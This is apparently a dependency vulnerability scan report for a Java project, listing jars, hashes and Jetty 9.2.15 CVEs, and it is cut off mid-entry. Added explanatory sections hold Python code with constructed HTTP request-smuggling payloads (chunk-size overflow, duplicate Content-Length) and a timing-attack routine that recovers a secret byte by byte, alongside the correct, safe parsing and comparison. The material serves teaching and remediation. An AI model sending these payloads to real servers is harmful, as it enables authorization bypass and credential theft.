MD5: b3f681be48fce094cf01a045f5bdca6f
SHA1: a47a971686474124562bdd4a7ccbd8ac8c3e8b11
SHA256:a93e4485d274277177480c4afe6ddd8355cda1cacfe356c134e25d65193935fd
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: cglib:cglib:2.2.2  Confidence:Highest

commons-digester3-3.2.jar

Description:

 The Apache Commons Digester package lets you configure an XML to Java object mapping module which triggers certain actions called rules whenever a particular pattern of nested XML elements is recognized.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/org/apache/commons/commons-digester3/3.2/commons-digester3-3.2.jar
MD5: 41d2c62c7aedafa7a3627794abc83f71
SHA1: c3f68c5ff25ec5204470fd8fdf4cb8feff5e8a79
SHA256:1c150e3d2df4b4237b47e28fea2079fb0da324578d5cca6a5fed2e37a62082ec
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.apache.commons:commons-digester3:3.2  Confidence:Highest

commons-cli-1.2.jar

Description:

 Commons CLI provides a simple API for presenting, processing and validating a command line interface.

License:

http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/commons-cli/commons-cli/1.2/commons-cli-1.2.jar
MD5: bfdcae1ff93f0c07d733f03bdce28c9e
SHA1: 2bf96b7aa8b611c177d329452af1dc933e14501c
SHA256:e7cd8951956d349b568b7ccfd4f5b2529a8c113e67c32b028f52ffda371259d9
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: commons-cli:commons-cli:1.2  Confidence:Highest

shrinkwrap-api-1.2.3.jar

Description:

 Client View of the ShrinkWrap Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/shrinkwrap-api/1.2.3/shrinkwrap-api-1.2.3.jar
MD5: 36ac70aabd6fd7714f49709a33ab63c8
SHA1: fbdf4de925f2afdfeed87bc9f610b83800c539fe
SHA256:0df8295ef9f3522c28e57343b784fe91bab7e2f56a7dbfefa70c29c9b313acd6
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap:shrinkwrap-api:1.2.3  Confidence:Highest

shrinkwrap-spi-1.2.3.jar

Description:

 Generic Service Provider Contract of the ShrinkWrap Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/shrinkwrap-spi/1.2.3/shrinkwrap-spi-1.2.3.jar
MD5: edeabb2298579049d625e80269e2910f
SHA1: 1322387bb13a8a062d291d1289647e8c6c022bcd
SHA256:08fb20a5ac4821a9bef304c956b282bcd4dbc25a89163c9cefb84a12301f2ad8
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap:shrinkwrap-spi:1.2.3  Confidence:Highest

shrinkwrap-impl-base-1.2.3.jar

Description:

 Common Base for Implementations of the ShrinkWrap Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/shrinkwrap-impl-base/1.2.3/shrinkwrap-impl-base-1.2.3.jar
MD5: 521b07410577d096e71d0cb04d9a4fff
SHA1: 448a61e4c8c6f6fcf61ab25b04811bba23cb4888
SHA256:5d5e0a2cc72dee9b500509e074ce527048ef0918757895c95cdb9fc67f12b922
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap:shrinkwrap-impl-base:1.2.3  Confidence:Highest

shrinkwrap-descriptors-api-base-2.0.0-alpha-8.jar

Description:

 Base for Client View of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-api-base/2.0.0-alpha-8/shrinkwrap-descriptors-api-base-2.0.0-alpha-8.jar
MD5: d75df77895cd1bfb13efafbdcd74385d
SHA1: 7f446d32e508ee54201c93318c72eef2ffb87e24
SHA256:0b7fad7d58ded231614104febeb05eabd3d5e9c329a1f1f10f0af7bc7201be35
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-base:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-api-javaee-2.0.0-alpha-8.jar

Description:

 Client View of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-api-javaee/2.0.0-alpha-8/shrinkwrap-descriptors-api-javaee-2.0.0-alpha-8.jar
MD5: 668b04e3cd4b0fb36e1272220e52c629
SHA1: feb1bdc6adf287616efeed76684e4ce51ae9aa99
SHA256:1cc485db273b2b7f6f092f71a4506200ae50df258f9a3b69ff11b6455b962961
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-api-javaee:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-spi-2.0.0-alpha-8.jar

Description:

 Service Provider Interface of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-spi/2.0.0-alpha-8/shrinkwrap-descriptors-spi-2.0.0-alpha-8.jar
MD5: 6e306734f6043b04440c9434ab6a135d
SHA1: fca9a421a27ddf52cc255c4d360d9b7c70689d05
SHA256:bd0ec013c62f67727a0ea54326a2592ca83fac9a467ba442654c4f0dce847146
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-spi:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-impl-base-2.0.0-alpha-8.jar

Description:

 Implementation of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-impl-base/2.0.0-alpha-8/shrinkwrap-descriptors-impl-base-2.0.0-alpha-8.jar
MD5: f4c4da51805683dd9128ce88d44298cd
SHA1: 9b2017df39cb9bcf9acad21b07b473bf7862a9a6
SHA256:2ea8e7c5469c00f9062ab7860362d3343fd39ab8a6a1bc210ac6100caa13ce1c
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-base:2.0.0-alpha-8  Confidence:Highest

shrinkwrap-descriptors-impl-javaee-2.0.0-alpha-8.jar

Description:

 Generated Implementation of the ShrinkWrap Descriptors Project

File Path: /Users/Kevin/.m2/repository/org/jboss/shrinkwrap/descriptors/shrinkwrap-descriptors-impl-javaee/2.0.0-alpha-8/shrinkwrap-descriptors-impl-javaee-2.0.0-alpha-8.jar
MD5: adaeb2eb248bc07138e8c0d677b47fcc
SHA1: 775ee808bcc6dbdc0b4e22dfdf5f45fe286828c7
SHA256:121194d249c6e64fc3bc54151839c0c93cfc90ceb4b735ad2addeb69e0965014
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.jboss.shrinkwrap.descriptors:shrinkwrap-descriptors-impl-javaee:2.0.0-alpha-8  Confidence:Highest

jericho-html-3.2.jar

Description:

 Jericho HTML Parser is a java library allowing analysis and manipulation of parts of an HTML document, including server-side tags, while reproducing verbatim any unrecognised or invalid HTML.

License:

GNU Lesser General Public License (LGPL): http://www.gnu.org/licenses/lgpl.txt
Eclipse Public License (EPL): http://www.eclipse.org/legal/epl-v10.html
File Path: /Users/Kevin/.m2/repository/net/htmlparser/jericho/jericho-html/3.2/jericho-html-3.2.jar
MD5: a8d9b91b1eac14db742d66673167f157
SHA1: b8385d9836562d75df8445db00c7e9c50459af9f
SHA256:cff62270e35f90df7e5797626c62546c1a3d6ce67ae154fc94c297e2db5a47cf
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.htmlparser.jericho:jericho-html:3.2  Confidence:Highest

zip4j-1.3.2.jar

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/net/lingala/zip4j/zip4j/1.3.2/zip4j-1.3.2.jar
MD5: 67577b0541256ea89d15e0edb6d2a7b8
SHA1: 4ba84e98ee017b74cb52f45962f929a221f3074c
SHA256:c67098d430c574311432728ebd4c7c45672f9ccf5c64702eb6afb8816c22ad08
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: net.lingala.zip4j:zip4j:1.3.2  Confidence:Highest

joda-time-2.9.2.jar

Description:

 Date and time library to replace JDK date handling

License:

Apache 2: http://www.apache.org/licenses/LICENSE-2.0.txt
File Path: /Users/Kevin/.m2/repository/joda-time/joda-time/2.9.2/joda-time-2.9.2.jar
MD5: 32a794b6a820daf3fad92e59988df64c
SHA1: 36d6e77a419cb455e6fd5909f6f96b168e21e9d0
SHA256:0be5c40e8cdce9ec0643d76be99f276db17c45d7616a217fd1b19b7ef73ca7b1
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: joda-time:joda-time:2.9.2  Confidence:Highest

jetty-jndi-9.2.15.v20160210.jar

Description:

 JNDI spi impl for java namespace.

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/jetty-jndi/9.2.15.v20160210/jetty-jndi-9.2.15.v20160210.jar
MD5: cba333b9e7a94f7d5f321ad9a91e4622
SHA1: 6e09b5428a8c53d0f66fd7a20064fa7973b0cbbe
SHA256:9448eb94f331916ee58912fa7ee793ef27ec2219a7450dc52c76a1a78da51708
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  
  • maven: org.eclipse.jetty:jetty-jndi:9.2.15.v20160210  Confidence:Highest

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions:

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions:

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions:
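
The descriptions of CVE-2017-7657 and CVE-2017-7658 above both come down to the same failure: the origin server and an intermediary in front of it disagree about where a request body ends, so bytes the intermediary treated as body are parsed by the origin as a second, never-authorized request. The following is an added example, not part of this report and not Jetty's code: a toy HTTP/1.1 request splitter in Python with two policy knobs that reproduce each bug next to its correct behaviour, run over constructed request bytes. The function names, the payload constants and the payloads themselves are assumptions of the example.

```python
"""Toy HTTP/1.1 request splitter modelling CVE-2017-7657 and CVE-2017-7658.

Added example, not Jetty's code. Two policy knobs reproduce each bug next to
the correct behaviour:
  chunk_size_bits       None = unbounded integer (correct); 32 = accumulate the
                        hex chunk size in a fixed-width int, so 2**32 + n wraps to n
  strict_content_length True = reject conflicting Content-Length values
                        (RFC 7230 3.3.3); False = first value wins, rest ignored
"""
from __future__ import annotations
import re

CRLF, HEADER_END = b"\r\n", b"\r\n\r\n"
CHUNK_SIZE_LINE = re.compile(rb"^([0-9A-Fa-f]+)(?:;[^\r\n]*)?$")   # size [; extensions]


class IncompleteRequest(Exception):
    """The buffer ends inside a declared body: a real server would keep reading."""


def parse_chunk_size(size_line: bytes, chunk_size_bits: int | None) -> int:
    m = CHUNK_SIZE_LINE.match(size_line)
    if not m:
        raise ValueError(f"bad chunk-size line: {size_line!r}")
    size = 0
    for digit in m.group(1).decode():
        size = size * 16 + int(digit, 16)
        if chunk_size_bits is not None:            # fixed-width accumulator wraps silently
            size &= (1 << chunk_size_bits) - 1
    return size


def read_chunked_body(buf: bytes, pos: int, chunk_size_bits: int | None) -> tuple[bytes, int]:
    """Consume a chunked body starting at pos; return (body, position after it)."""
    body = b""
    while True:
        eol = buf.find(CRLF, pos)
        if eol < 0:
            raise IncompleteRequest("chunk-size line not complete")
        size = parse_chunk_size(buf[pos:eol], chunk_size_bits)
        if size == 0:                              # last-chunk, optional trailers, CRLF
            end = buf.find(HEADER_END, eol)
            if end < 0:
                raise IncompleteRequest("last-chunk terminator not complete")
            return body, end + 4
        pos = eol + 2
        if len(buf) < pos + size + 2:
            raise IncompleteRequest(f"waiting for a {size}-byte chunk")
        body += buf[pos:pos + size]
        pos += size + 2                            # chunk data plus its trailing CRLF


def content_length(headers: list[tuple[bytes, bytes]], strict: bool) -> int:
    values = [v for n, v in headers if n == b"content-length"]
    if not values:
        return 0
    if strict and len(set(values)) > 1:
        raise ValueError(f"conflicting Content-Length values: {values!r}")
    return int(values[0])                          # lenient: first wins, the rest are ignored


def split_requests(buf: bytes, *, chunk_size_bits: int | None = None,
                   strict_content_length: bool = True) -> list[dict]:
    """Split a byte stream into the requests an origin server would see."""
    requests, pos = [], 0
    while pos < len(buf):
        end = buf.find(HEADER_END, pos)
        if end < 0:
            raise IncompleteRequest("headers not complete")
        lines = buf[pos:end].split(CRLF)
        headers = [(n.strip().lower(), v.strip())
                   for n, _, v in (line.partition(b":") for line in lines[1:])]
        pos = end + 4
        encodings = [v.lower() for n, v in headers if n == b"transfer-encoding"]
        if encodings and b"chunked" in encodings[-1]:  # chunked overrides Content-Length
            body, pos = read_chunked_body(buf, pos, chunk_size_bits)
        else:
            length = content_length(headers, strict_content_length)
            if len(buf) < pos + length:
                raise IncompleteRequest(f"waiting for {length} body bytes")
            body, pos = buf[pos:pos + length], pos + length
        requests.append({"line": lines[0], "headers": headers, "body": body})
    return requests


def origin_view(buf: bytes, **policy) -> tuple[str, list[bytes]]:
    """('ok', request targets) | ('waiting', []) | ('rejected', []) under a policy."""
    try:
        targets = [r["line"].split(b" ")[1] for r in split_requests(buf, **policy)]
    except IncompleteRequest:
        return "waiting", []
    except ValueError:
        return "rejected", []
    return "ok", targets


# Constructed payloads, not captured traffic. SMUGGLED is the request the
# intermediary never parses as a request; an origin that splits it off serves it.
SMUGGLED = b"GET /admin HTTP/1.1\r\nHost: app\r\n\r\n"
POST_HEAD = b"POST /upload HTTP/1.1\r\nHost: app\r\n"
BENIGN_CHUNKED = POST_HEAD + b"Transfer-Encoding: chunked\r\n\r\n5\r\nhello\r\n0\r\n\r\n"
# 0x100000010 == 2**32 + 16: a 32-bit accumulator reads 16 and ends the body early.
CHUNK_OVERFLOW = (POST_HEAD + b"Transfer-Encoding: chunked\r\n\r\n100000010\r\n"
                  + b"A" * 16 + b"\r\n0\r\n\r\n" + SMUGGLED)
# Two Content-Length values; all 5 + len(SMUGGLED) body bytes are forwarded unchanged.
DUP_CONTENT_LENGTH = (POST_HEAD + b"Content-Length: 5\r\nContent-Length: %d\r\n\r\nAAAAA"
                      % (5 + len(SMUGGLED)) + SMUGGLED)

if __name__ == "__main__":
    for label, buf, policy in [("7657, 32-bit chunk size", CHUNK_OVERFLOW, {"chunk_size_bits": 32}),
                               ("7657, unbounded", CHUNK_OVERFLOW, {}),
                               ("7658, first CL wins", DUP_CONTENT_LENGTH, {"strict_content_length": False}),
                               ("7658, strict CL", DUP_CONTENT_LENGTH, {})]:
        print(f"{label:26}: {origin_view(buf, **policy)}")
```

Under the buggy policies the origin reports two requests, the second being the GET /admin that the intermediary forwarded as body bytes. Under the correct policies it either keeps waiting (the chunk genuinely declares a 4 GiB size, so the request never completes) or rejects the request outright. For a deployment the remedy for these CVEs is upgrading Jetty; rejecting ambiguous framing at the intermediary (conflicting Content-Length values, chunk sizes it will not buffer) is the defence in depth that makes the origin's parsing irrelevant.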

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:
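
The timing channel described under CVE-2017-9735 is the classic early-exit comparison: a check that returns at the first mismatching byte does more work the longer the attacker's correct prefix is. The following is an added example, not part of this report and not Jetty's util/security/Password.java. Wall-clock measurements are noisy, so it models the leak as the number of bytes each comparator examined before returning, and includes a prefix-extension attack against the leaky comparator to show what the channel buys an attacker. SECRET, ALPHABET and the function names are assumptions of the example.

```python
"""Model of the timing channel in CVE-2017-9735 (added example, not Jetty's code).

Each comparator returns (matched, bytes_examined). The second value stands in
for elapsed time, which is what a remote attacker observes."""
from __future__ import annotations
import hmac

SECRET = b"s3cret!!"                                  # constructed, not a real credential
ALPHABET = b"0123456789abcdefghijklmnopqrstuvwxyz!?"  # search space for the demo


def early_exit_equal(expected: bytes, candidate: bytes) -> tuple[bool, int]:
    """Stops at the first mismatch: work done grows with the correct prefix length."""
    if len(expected) != len(candidate):
        return False, 0
    examined = 0
    for a, b in zip(expected, candidate):
        examined += 1
        if a != b:
            return False, examined
    return True, examined


def constant_time_equal(expected: bytes, candidate: bytes) -> tuple[bool, int]:
    """Examines every byte of `expected` and folds mismatches with OR, so neither the
    loop count nor the branch taken depends on where the secret differs. Production
    code should call hmac.compare_digest; the loop is spelled out so the work done is
    visible, and the result is cross-checked against the library call."""
    padded = candidate[:len(expected)].ljust(len(expected), b"\0")
    diff = len(expected) ^ len(candidate)
    for a, b in zip(expected, padded):
        diff |= a ^ b
    equal = diff == 0
    assert equal == hmac.compare_digest(expected, candidate)
    return equal, len(expected)


def leak_profile(compare, expected: bytes, guesses: list[bytes]) -> list[int]:
    """Bytes examined per guess: a flat profile means no prefix information leaks."""
    return [compare(expected, g)[1] for g in guesses]


def recover_secret(oracle, length: int, alphabet: bytes) -> bytes:
    """Prefix-extension attack against a timing oracle: at each position keep the byte
    that makes the comparison do the most work (ties go to the first byte tried, so a
    flat oracle yields garbage). Cost is len(alphabet) * length queries instead of
    len(alphabet) ** length."""
    known = b""
    for pos in range(length):
        pad = b"\0" * (length - pos - 1)

        def score(c: int) -> tuple[int, bool]:
            matched, examined = oracle(known + bytes([c]) + pad)
            return examined, matched

        known += bytes([max(alphabet, key=score)])
    return known


if __name__ == "__main__":
    guesses = [b"a3cret!!", b"s3crex!!", b"s3cret!?", b"short"]
    print("early-exit profile   :", leak_profile(early_exit_equal, SECRET, guesses))
    print("constant-time profile:", leak_profile(constant_time_equal, SECRET, guesses))
    for name, cmp in (("early-exit", early_exit_equal), ("constant-time", constant_time_equal)):
        print(f"recovered via {name:13}:", recover_secret(lambda g: cmp(SECRET, g), len(SECRET), ALPHABET))
```

Against the early-exit comparator the attack rebuilds the whole secret in len(ALPHABET) * len(SECRET) queries; against the constant-time comparator every guess costs the same and the attack recovers nothing. Real attackers must average many requests to see the per-byte difference through network jitter, which is why the CVE says the channel "makes it easier" to obtain access rather than granting it outright.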

javax.annotation-api-1.2.jar

Description:

 Common Annotations for the JavaTM Platform API

License:

CDDL + GPLv2 with classpath exception: https://glassfish.dev.java.net/nonav/public/CDDL+GPL.html
File Path: /Users/Kevin/.m2/repository/javax/annotation/javax.annotation-api/1.2/javax.annotation-api-1.2.jar
MD5: 75fe320d2b3763bd6883ae1ede35e987
SHA1: 479c1e06db31c432330183f5cae684163f186146
SHA256:5909b396ca3a2be10d0eea32c74ef78d816e1b4ead21de1d78de1f890d033e04
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: javax.annotation:javax.annotation-api:1.2  Confidence:Highest

jetty-schemas-3.1.M0.jar

Description:

 Administrative parent pom for Jetty modules

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/toolchain/jetty-schemas/3.1.M0/jetty-schemas-3.1.M0.jar
MD5: 163aba653172131b21223b87ce5abf29
SHA1: 6179bafb6ed2eb029862356df6713078c7874f85
SHA256:bb94452226bf103848614948c88f44d1057c2d9203d53affc1c9057a16223907
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.toolchain:jetty-schemas:3.1.M0  Confidence:Highest

apache-el-8.0.9.M3.jar

Description:

 A rebundling of Apache Tomcat Jasper to remove the tomcat server dependencies, so that the JSP engine can be used by the Eclipse Jetty project.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/org/mortbay/jasper/apache-el/8.0.9.M3/apache-el-8.0.9.M3.jar
MD5: 1df9a4b4e119cd3d092c92e0f51f2dce
SHA1: 98daa71c32b7d27dd9463b36de9cebab3f2e5e2e
SHA256:e55df966c864f749becd6f9fbd896e062935650a99880438ffef7b2614d59fc5
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.mortbay.jasper:apache-el:8.0.9.M3  Confidence:Highest
  • cpe: cpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3  Confidence:Low  

apache-jsp-8.0.9.M3.jar

Description:

 A rebundling of Apache Tomcat Jasper to remove the tomcat server dependencies, so that the JSP engine can be used by the Eclipse Jetty project.

License:

http://www.apache.org/licenses/LICENSE-2.0
File Path: /Users/Kevin/.m2/repository/org/mortbay/jasper/apache-jsp/8.0.9.M3/apache-jsp-8.0.9.M3.jar
MD5: 9ad2032b63ceb54659c50fd5e733391a
SHA1: 0e46309f2423c0d7321cc2a0928f4e411b82aee9
SHA256:0c154c190b7e75530e7b0b015a370343e9e5ae80550d7d1e8c12f33725df66ec
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:apache_tomcat:apache_tomcat:8.0.9.m3  Confidence:Low  
  • cpe: cpe:/a:jasper_project:jasper:8.0.9.m3  Confidence:Low  
  • maven: org.mortbay.jasper:apache-jsp:8.0.9.M3  Confidence:Highest

org.eclipse.jdt.core-3.8.2.v20130121.jar

Description:

 
 This artifact originates from the Eclipse Project at Eclipse; it is an OSGi bundle and is signed as well. Originally: org.eclipse.jdt.core.compiler.batch_3.8.2.v20130121-145325

File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/orbit/org.eclipse.jdt.core/3.8.2.v20130121/org.eclipse.jdt.core-3.8.2.v20130121.jar
MD5: bbcc2904953263282f55ebb3b8cfbc95
SHA1: ebb04771ae21dec8682e4153e97404d9933a9c13
SHA256:fc38504b81078d4a39e4f037bf635b9183a4e313d2d23b0f7be8a21f2ac8ab98
Referenced In Project/Scope:trial:compile

Identifiers

  • maven: org.eclipse.jetty.orbit:org.eclipse.jdt.core:3.8.2.v20130121  Confidence:Highest
  • cpe: cpe:/a:eclipse:jetty:3.8.2.v20130121  Confidence:Low  
  • cpe: cpe:/a:jetty:jetty:3.8.2.v20130121  Confidence:Low  

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions:

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), transfer-encoding chunks are handled poorly. The chunk length parsing was vulnerable to an integer overflow. Thus a large chunk size could be interpreted as a smaller chunk size and content sent as chunk body could be interpreted as a pipelined request. If Jetty was deployed behind an intermediary that imposed some authorization and that intermediary allowed arbitrarily large chunks to be passed on unchanged, then this flaw could be used to bypass the authorization imposed by the intermediary as the fake pipelined request would not be interpreted by the intermediary as a request.

Vulnerable Software & Versions:

CVE-2017-7658  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-19 Data Processing Errors

In Eclipse Jetty Server, versions 9.2.x and older, 9.3.x (all non HTTP/1.x configurations), and 9.4.x (all HTTP/1.x configurations), when presented with two content-lengths headers, Jetty ignored the second. When presented with a content-length and a chunked encoding header, the content-length was ignored (as per RFC 2616). If an intermediary decided on the shorter length, but still passed on the longer body, then body content could be interpreted by Jetty as a pipelined request. If the intermediary was imposing authorization, the fake pipelined request would bypass that authorization.

Vulnerable Software & Versions:

CVE-2017-9735  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:P/I:N/A:N)
CWE: CWE-200 Information Exposure

Jetty through 9.4.x is prone to a timing channel in util/security/Password.java, which makes it easier for remote attackers to obtain access by observing elapsed times before rejection of incorrect passwords.

Vulnerable Software & Versions:
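
The two cpe identifiers on this dependency are Low confidence matches and, unlike the same CPEs on the 9.2.15.v20160210 Jetty jars elsewhere in this report, do not fit the artifact: the description says the jar is org.eclipse.jdt.core.compiler.batch (the Eclipse Java compiler) repackaged under the org.eclipse.jetty.orbit group, and 3.8.2.v20130121 is a JDT version, not a Jetty release. The four Jetty HTTP-parsing CVEs listed under it follow from that CPE match, not from anything in the compiler. Below is an added example, not part of the generated report, of a Dependency-Check suppression entry for this one match, pinned to the SHA1 reported above; the file name suppressions.xml is an assumption.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<suppressions xmlns="https://jeremylong.github.io/DependencyCheck/dependency-suppression.1.3.xsd">
  <suppress>
    <notes><![CDATA[
      org.eclipse.jdt.core-3.8.2.v20130121.jar is the Eclipse JDT batch compiler
      (see its description in the report), repackaged under the org.eclipse.jetty.orbit
      group. 3.8.2.v20130121 is a JDT version, not a Jetty release, so the Low
      confidence Jetty CPEs and the Jetty HTTP-parsing CVEs attached to them do not
      apply to this jar. Pinned to the reported SHA1: a new version of the jar gets a
      new hash, this entry stops matching, and the match is reviewed again.
    ]]></notes>
    <sha1>ebb04771ae21dec8682e4153e97404d9933a9c13</sha1>
    <cpe>cpe:/a:eclipse:jetty</cpe>
    <cpe>cpe:/a:jetty:jetty</cpe>
  </suppress>
</suppressions>
```

Pass the file to the scan with the CLI's --suppression option. Keep the notes element filled in; the report's "Suppressing false positives" link describes the same format, and the note is what the next reviewer will read. Do not reuse this entry for the jetty-jndi, apache-jsp, websocket-common and javax-websocket-server-impl 9.2.15.v20160210 jars: those belong to a Jetty 9.2.15 deployment, which the CVE descriptions place inside the affected "9.2.x and older" range, and the remedy there is upgrading Jetty as a whole rather than suppressing the findings.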

apache-jsp-9.2.15.v20160210.jar

Description:

 Jetty-specific ServletContainerInitializer for Jasper

License:

http://www.apache.org/licenses/LICENSE-2.0, http://www.eclipse.org/org/documents/epl-v10.php
File Path: /Users/Kevin/.m2/repository/org/eclipse/jetty/apache-jsp/9.2.15.v20160210/apache-jsp-9.2.15.v20160210.jar
MD5: 136f4f799c49dcc361176415ebeb8992
SHA1: 8989a61eeb3e415131196a24dec8317da3ca136d
SHA256:ac352dd03ef66e63a45ca24d0c00076f0622f06b4fab73b69d1625ac53af4d5b
Referenced In Project/Scope:trial:compile

Identifiers

  • cpe: cpe:/a:jetty:jetty:9.2.15.v20160210  Confidence:Low  
  • cpe: cpe:/a:eclipse:jetty:9.2.15.v20160210  Confidence:Low  
  • maven: org.eclipse.jetty:apache-jsp:9.2.15.v20160210  Confidence:Highest

CVE-2017-7656  

Severity:Medium
CVSS Score: 5.0 (AV:N/AC:L/Au:N/C:N/I:P/A:N)
CWE: CWE-284 Improper Access Control

In Eclipse Jetty, versions 9.2.x and older, 9.3.x (all configurations), and 9.4.x (non-default configuration with RFC2616 compliance enabled), HTTP/0.9 is handled poorly. An HTTP/1 style request line (i.e. method space URI space version) that declares a version of HTTP/0.9 was accepted and treated as a 0.9 request. If deployed behind an intermediary that also accepted and passed through the 0.9 version (but did not act on it), then the response sent could be interpreted by the intermediary as HTTP/1 headers. This could be used to poison the cache if the server allowed the origin client to generate arbitrary content in the response.

Vulnerable Software & Versions:

CVE-2017-7657  

Severity:High
CVSS Score: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P)
CWE: CWE-190 Integer Overflow or Wraparound

